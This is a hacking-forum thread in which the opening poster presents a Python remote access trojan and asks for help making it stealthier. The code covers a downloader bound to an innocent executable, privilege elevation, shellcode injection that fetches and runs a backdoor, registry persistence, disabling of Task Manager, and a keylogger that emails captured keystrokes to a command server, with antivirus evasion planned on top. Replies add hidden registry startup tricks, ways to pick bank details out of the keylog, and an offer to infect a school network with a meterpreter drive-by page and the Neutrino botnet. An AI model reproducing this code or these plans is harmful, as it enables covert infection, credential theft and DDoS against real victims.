User Controls
Sophie's Remote Access Trojan, Build 0.71 (Thoughts, ideas, comments & advice?)
-
2015-08-29 at 5:54 PM UTCOk so as some of you know i am working on improving gcat and i have come up with what i think is a working model including relevant code. Now i will give credit where credit is due and will mention that bytebleeder over at github is the one that did all the yeoman's work on this since he is the author of the actual main module which would include the implant and the controller. That being said however, the trojan wasn't really functional in a real life scenario since it did not offer anything in way of persistence or self preservation. So I set out to remedy this and after a lot of research this is what i came up with. I'll dissect the code as i work through it as this makes it easier for review.
The malware conists of the following.- Downloader
- Backdoor
The downloader will be bound to an innocent executable and is designed to download and run the backdoor file.
import os
import sys
import ctypes
import os.path
import _winreg
import win32com.shell.shell as shell
ASADMIN = 'asadmin'
if sys.argv[-1] != ASADMIN:
script = os.path.abspath(sys.argv[0])
params = ' '.join([script] + sys.argv[1:] + [ASADMIN])
shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters=params)
sys.exit(0)
I start off by importing the libs i need for the downloader and proceed to elevate the executables privilege, i read that by using ShellExecuteEx and then exiting at the end, the program will actually run the next lines of code as administrator without notifying the user. When i was testing it as script however i got a prompt that python.exe was requesting admin privilege(The interpreter not the script). I did not yet test when compiled but in case it still requests admin privilege i might as well define so with a flag when compiling with pyinstaller anyway, no need to use this 'trick' in that case.
After the program has recieved admin privilege it's going to check if we already downloaded the main module and if we haven't it's going to run shellcode that will do so and execute the main module.
PATH = 'C:\\Program Files\\Windows Defender\\secureserve.exe'
if os.path.isfile(PATH) and os.access(PATH, os.R_OK):
break
else:
# Download file to path and execute (shellcode)
shellcode = bytearray(
"\xdb\xc3\xd9\x74\x24\xf4\xbe\xe8\x5a\x27\x13\x5f\x31\xc9"
"\xb1\x33\x31\x77\x17\x83\xc7\x04\x03\x9f\x49\xc5\xe6\xa3"
"\x86\x80\x09\x5b\x57\xf3\x80\xbe\x66\x21\xf6\xcb\xdb\xf5"
"\x7c\x99\xd7\x7e\xd0\x09\x63\xf2\xfd\x3e\xc4\xb9\xdb\x71"
"\xd5\x0f\xe4\xdd\x15\x11\x98\x1f\x4a\xf1\xa1\xd0\x9f\xf0"
"\xe6\x0c\x6f\xa0\xbf\x5b\xc2\x55\xcb\x19\xdf\x54\x1b\x16"
"\x5f\x2f\x1e\xe8\x14\x85\x21\x38\x84\x92\x6a\xa0\xae\xfd"
"\x4a\xd1\x63\x1e\xb6\x98\x08\xd5\x4c\x1b\xd9\x27\xac\x2a"
"\x25\xeb\x93\x83\xa8\xf5\xd4\x23\x53\x80\x2e\x50\xee\x93"
"\xf4\x2b\x34\x11\xe9\x8b\xbf\x81\xc9\x2a\x13\x57\x99\x20"
"\xd8\x13\xc5\x24\xdf\xf0\x7d\x50\x54\xf7\x51\xd1\x2e\xdc"
"\x75\xba\xf5\x7d\x2f\x66\x5b\x81\x2f\xce\x04\x27\x3b\xfc"
"\x51\x51\x66\x6a\xa7\xd3\x1c\xd3\xa7\xeb\x1e\x73\xc0\xda"
"\x95\x1c\x97\xe2\x7f\x59\x67\xa9\x22\xcb\xe0\x74\xb7\x4e"
"\x6d\x87\x6d\x8c\x88\x04\x84\x6c\x6f\x14\xed\x69\x2b\x92"
"\x1d\x03\x24\x77\x22\xb0\x45\x52\x41\x57\xd6\x3e\xa8\xf2"
"\x5e\xa4\xb4")
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
The shellcode provided here is actually an example. The proper shellcode will be generated by me using msfvenom but only if i can define the path that it's going to be downloaded to instead of the working directory(Haven't checked yet) i'll encode it with 'shikata ga nai' encoding to ensure we get no trouble from any anti-virus application. Failing that i will use the following script to generate custom shellcode.
http://pastebin.com/9GYU1kmL
This script is ready to use by the way and will ask you for a URL to the file you wish to download and to define a path to where it should be downloaded. It will put out an ASM(Asembly) file
which you can convert from the terminal using the following command:
objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
Replace 'program' with the name of your ASM file. And it will output your shellcode.
Anyway, after the shellcode has executed the downloader will then add a registry key which will make it so the main module is loaded at boot. Here's the code for that:
# Registry key
PATH_TO_YOUR_EXECUTABLE = PATH
node = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, 'Software\\Microsoft\\Windows\\CurrentVersion\\Run ', 0, _winreg.KEY_ALL_ACCESS)
_winreg.SetValueEx(node, 'foobar', 0, _winreg.REG_SZ, PATH_TO_YOUR_EXECUTABLE)
After that i want to have the downloader disable the task manager by changing the following registry value:
aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_SET_VALUE)
SetValueEx(aKey,"DisableTaskMgr",1, REG_DWORD, 0)
CloseKey(aKey)
If all goes well, by this time the main module will be up and running and will have contacted my C&C, the code for the main module is basically the same as bytebleeder's original however i am pickling my keylogger data for data persistence as shown below.
https://github.com/byt3bl33d3r/gcat/...ter/implant.py
class KeyLogger(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.jobid = None
#self.key_buffer = ''
try:
f = open('key.log', 'rb')
self.key_buffer = pickle.load(f)
f.close()
except IOError:
self.key_buffer = ''
self.daemon = True
def run(self):
#logging.debug("[keylogger] started with jobid: {}".format(self.jobid))
t1 = threading.Thread(name='sendEmail', target=sendEmail, args=({'CMD': 'keylogger', 'RES': 'Keylogger started'}, self.jobid,))
t2 = threading.Thread(name='watchKeys', target=self.watchKeys)
for t in [t1, t2]:
t.setDaemon(True)
t.start()
while True:
hm = pyHook.HookManager()
hm.KeyDown = self.onKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
def stop(self):
#logging.debug("[keylogger] stopped with jobid: {}".format(self.jobid))
t = threading.Thread(name='sendEmail', target=sendEmail, args=({'CMD': 'keylogger', 'RES': 'Keylogger stopped'}, self.jobid,))
t.setDaemon(True)
t.start()
def watchKeys(self):
while True:
if len(self.key_buffer) >= 100:
keys = self.key_buffer
t = threading.Thread(name='sendEmail', target=sendEmail, args=({'CMD': 'keylogger', 'RES': r'{}'.format(keys)}, self.jobid,))
t.setDaemon(True)
t.start()
self.key_buffer = ''
time.sleep(0.5)
def onKeyboardEvent(self, event):
if event.Ascii != 0 or 8:
self.key_buffer += chr(event.Ascii)
if event.Ascii == 13:
self.key_buffer += chr(event.Ascii)
f = open('key.log', 'wb')
self.key_buffer = pickle.dump(self.key_buffer, f)
f.close()
Props to lanny for helping me out with pickling my keylogger data.
I'll be encoding the finished product once more with the python tool called PeCloak, for AV and Sandbox evasion.
http://seclist.us/pecloak-py-beta-a-...sion-tool.html
In any event, i'd like to hear your thoughts on this, how could i improve it even more? Make it better and more stealthy? Also, in the downloader i am checking to see if i already downloaded everything with an 'if' statement. In the else part i am basically running the rest of the program. Is there any problem with this i am not seeing? Also, is there a better solution to get privilege escalation other than what i used here?
Anyway, please let me know what you think. -
2015-08-29 at 6:08 PM UTC
-
2015-08-29 at 6:41 PM UTC
-
2015-08-29 at 8 PM UTCMy python knowledge is pretty rudimentary as I am still working on my programming knowledge and ability to be honest but from what I know I don't see why it would be problematic. If I think of anything I will certianly let you know. I suppose one thing I would think would add more pwnage would be a method of separating things like CC info, personal data and account data from the other aribitary keystrokes logged.
-
2015-08-29 at 8:13 PM UTC
My python knowledge is pretty rudimentary as I am still working on my programming knowledge and ability to be honest but from what I know I don't see why it would be problematic. If I think of anything I will certianly let you know.
Cool thanks.I suppose one thing I would think would add more pwnage would be a method of separating things like CC info, personal data and account data from the other aribitary keystrokes logged.
The easiest solution that i can think of for that, would probably be writing a program that scans for certain words or URLs in the dump of the keylogger data that we retrieve. Say a victim types in www.bankofamerica.com it is fair to assume that some personal information is to follow soon after.
There's a fun project, we could probably write a script for that.
Or there's probably a way in which we can grab keystrokes from forms and such but i imagine that would be pretty involved to pull off. -
2015-08-30 at 3:09 PM UTCLanny says you don't need to specify the PATH, and he knows what he's talking about.
-
2015-08-30 at 3:32 PM UTC
Lanny says you don't need to specify the PATH, and he knows what he's talking about.
Sophie says i do need to specify the path when generating the shellcode because as far as i know if i don't the shellcode will download the main module to the working directory and the working directory is subject to change and i can't have that if i need to point my registry entry to a specific location.
Also and you may not be able to grasp this but the variable 'PATH' is essential for the proper operation of the downloader.
PATH = 'C:\\Documents and Settings\\Pictures\\youknownothingspectral.jpg' -
2015-08-30 at 4:38 PM UTCAlso spectral let me tell you something about variables. Variables are pretty cool, i can give them a value and simply type the name of the variable to call upon the value i specified it doesn't even matter what i call the variable, but it's good practice to use proper variable names, hence the name of PATH in my previous code. What's more variables are, you guessed it, variable, so i can change their value as i go along.
Say i have a variable named 'int' and i have a value of 1 associated with it and i have a variable named int2 which has a value of 2 associated with it, now i can do some maffs by adding the variables or what have you. Or say i have a variable named list with a value of [10,10,10] now i can make a function to append something to that list which will change the value of the variable.
list = [10,10,10]
def add(list):
list.append([5,5,5]);
print list
return
add(list)
Before you ask, yes i am a sorcerer. -
2015-08-30 at 7:59 PM UTCOf course it has to be on the PATH, you chronic nit-wit. That was my point. I was just making it clear that Lanny insists it's completely unnecessary - that the trojan can find its own files and folders all on its own.
-
2015-08-30 at 8:42 PM UTC
Of course it has to be on the PATH, you chronic nit-wit. That was my point
No need to be nasty, i don't seem to remember calling you any names. I was happy you were participating like a normal poster in this thread.I was just making it clear that Lanny insists it's completely unnecessary
I highly doubt that and even if he did it would probably be in relation to a trojan/virus/malware that has some logic to create it's own directories and sub-directories.- that the trojan can find its own files and folders all on its own.
See above, also, my trojan doesn't exactly find anything. I generate the shellcode in such a way that it knows where the main module has to go and since i know where my main module is going i can easily have my registry entry point in the right direction via the downloader. -
2015-08-31 at 2:54 PM UTC
I highly doubt that and even if he did it would probably be in relation to a trojan/virus/malware that has some logic to create it's own directories and sub-directories.
Lanny knows more than you and I put together. If he says you don't need to specify an environment path, you can bet your last roll of toilet paper he's bang on.
By the way... never use the standard startup locations in the registry, as they will be easily detected. There are much better locations. For example...
- run as a shell of all .exe executable files
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@=""youwho!.exe %1" %*"
- run as an active setup install stub
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}]
@="YouHoo!!"
"ComponentID"="YouHoo Component"
"IsInstalled"=dword:00000001
"Locale"="EN"
"StubPath"=hex(2):25,00,53,00,79,00,73,00,74,00,65 ,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d ,00,33,00,32,00,5c,00,72,\
00,65,00,67,00,73,00,76,00,72,00,33,00,32,00,2e,00 ,65,00,78,00,65,00,20,00,\
2f,00,73,00,20,00,2f,00,6e,00,20,00,2f,00,69,00,3a ,00,2f,00,55,00,73,00,65,\
00,72,00,49,00,6e,00,73,00,74,00,61,00,6c,00,6c,00 ,20,00,25,00,53,00,79,00,\
73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25 ,00,5c,00,73,00,79,00,73,\
00,74,00,65,00,6d,00,33,00,32,00,5c,00,74,00,68,00 ,65,00,6d,00,65,00,75,00,\
69,00,2e,00,64,00,6c,00,6c,00,00,00
"Version"="6,6,6,6"
-
2015-08-31 at 3:21 PM UTC
Lanny knows more than you and I put together.
This is true and i am glad you finally admit that.If he says you don't need to specify an environment path, you can bet your last roll of toilet paper he's bang on.
Lol environment path? We're not even messing with system variables. Also, in case you mean path don't be silly, i can't load the trojan at boot via the registry if i don't. Also, if The Lan Man has an alternative i'd gladly read his reply ITT, you don't have to speak for him he's perfectly capable of doing that on his own.By the way… never use the standard startup locations in the registry, as they will be easily detected. There are much better locations. For example…
I'm banking on targets not knowing the first thing about computers, also, i wanted to run the trojan as a service and i have some code for that but unfortunately for autonomous install i have to pass a custom argv to PyWin32's handleCommandLine and that's a bit above my paygrade as of yet. If you wanna' prove you're l337, finish the script for me why don't you. http://niggasin.space/forum/technophiliacs-technophiles/12874-running-python-program-as-a-windows-service- run as a shell of all .exe executable files
I don't think you know what a shell is.[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@=""youwho!.exe %1" %*"
- run as an active setup install stub
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}]
@="YouHoo!!"
"ComponentID"="YouHoo Component"
"IsInstalled"=dword:00000001
"Locale"="EN"
"StubPath"=hex(2):25,00,53,00,79,00,73,00,74,0 0,65 ,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d ,00,33,00,32,00,5c,00,72,\
00,65,00,67,00,73,00,76,00,72,00,33,00,32,00,2e,00 ,65,00,78,00,65,00,20,00,\
2f,00,73,00,20,00,2f,00,6e,00,20,00,2f,00,69,00,3a ,00,2f,00,55,00,73,00,65,\
00,72,00,49,00,6e,00,73,00,74,00,61,00,6c,00,6c,00 ,20,00,25,00,53,00,79,00,\
73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25 ,00,5c,00,73,00,79,00,73,\
00,74,00,65,00,6d,00,33,00,32,00,5c,00,74,00,68,00 ,65,00,6d,00,65,00,75,00,\
69,00,2e,00,64,00,6c,00,6c,00,00,00
"Version"="6,6,6,6"
Why would i want to break all file associations. Also, messing with this registry entry has been around forever so if anything it's not more stealthy. -
2015-08-31 at 4:15 PM UTCIn the old days, we referred to a shell as a process which acts as an envelope of another process. Not sure what you kids today would call a shell. Could be anything, really. And, no, hardly anyone is even aware of the ability to run a process as a shell of all executable files on the system. Even most scanners don't pick it up as a startup, and, no, doing so does not break any file associations at all.
-
2015-09-01 at 3:10 PM UTCJust started a web design class in school. Down to help me cause chaos?
-
2015-09-01 at 9:35 PM UTC
Just started a web design class in school. Down to help me cause chaos?
Lol, i can try, what do you need bruh? -
2015-09-02 at 2:23 PM UTC
Lol, i can try, what do you need bruh?
Viruses, malware, etc. for the types of code I show you. -
2015-09-02 at 3:19 PM UTCWe're designing using Adobe DreamWeaver. So basically anything that can fuck with that.
-
2015-09-02 at 5:47 PM UTCYou want malicious javascript or something similar then, i suck at javascript, lol. I'll tell you what, how about a website that installs a reverse TCP meterpreter? You could make a website and host it, and i'll point my social engineering toolkit at it to rip it and embed a meterpreter with your IP, so that you can run a handler on your machine. I'll give you the files, and you can host it again at school or wherever. Then when people go to visit the site you've created they will recieve a notification that they have to update java, when they click ok, the payload will be delivered, once you open a handler on your own computer or a computer under your control, you will own the infected computer. Oh by the way, i also got neutrino botnet, if we set up a C&C we could infect the school network and use it for DDoS attacks etc.
-
2015-09-04 at 1:57 AM UTCFor the love of god please don't host a malicious site on your school accout. To be honest the class will probably be a waste of your time, I don't think any professionals use dreamweaver anymore. You will do much better off learning everything from scratch. You want to learn as much javascript and php as possible. Javascript especially.
You want malicious javascript or something similar then, i suck at javascript, lol. I'll tell you what, how about a website that installs a reverse TCP meterpreter? You could make a website and host it, and i'll point my social engineering toolkit at it to rip it and embed a meterpreter with your IP, so that you can run a handler on your machine. I'll give you the files, and you can host it again at school or wherever. Then when people go to visit the site you've created they will recieve a notification that they have to update java, when they click ok, the payload will be delivered, once you open a handler on your own computer or a computer under your control, you will own the infected computer. Oh by the way, i also got neutrino botnet, if we set up a C&C we could infect the school network and use it for DDoS attacks etc.
I had to comment out the authentication line in order to get to the login screen, not sure if they did this intentionally or if I fucked something up. It's a big project, I really want to get a good understanding of how it works. Half the code seems to simply point to it's own 404 screens. What I read seems to say that it's intentional? idk. Couldn't fucking get the builder exe to install on my vm, but I might have been trying to go from linux to win (I forget now).
Anyway fuck dreamweaver. -
2015-09-04 at 2:52 AM UTC
I had to comment out the authentication line in order to get to the login screen, not sure if they did this intentionally or if I fucked something up. It's a big project, I really want to get a good understanding of how it works. Half the code seems to simply point to it's own 404 screens. What I read seems to say that it's intentional? idk. Couldn't fucking get the builder exe to install on my vm, but I might have been trying to go from linux to win (I forget now).
Anyway fuck dreamweaver.
Which one are you building? Neutrino? Because i seem to remember sending you a couple, in any event do keep me posted. Personally i've been a bit busy with IRL things but i plan on working on at least one project i have going on, on the weekend.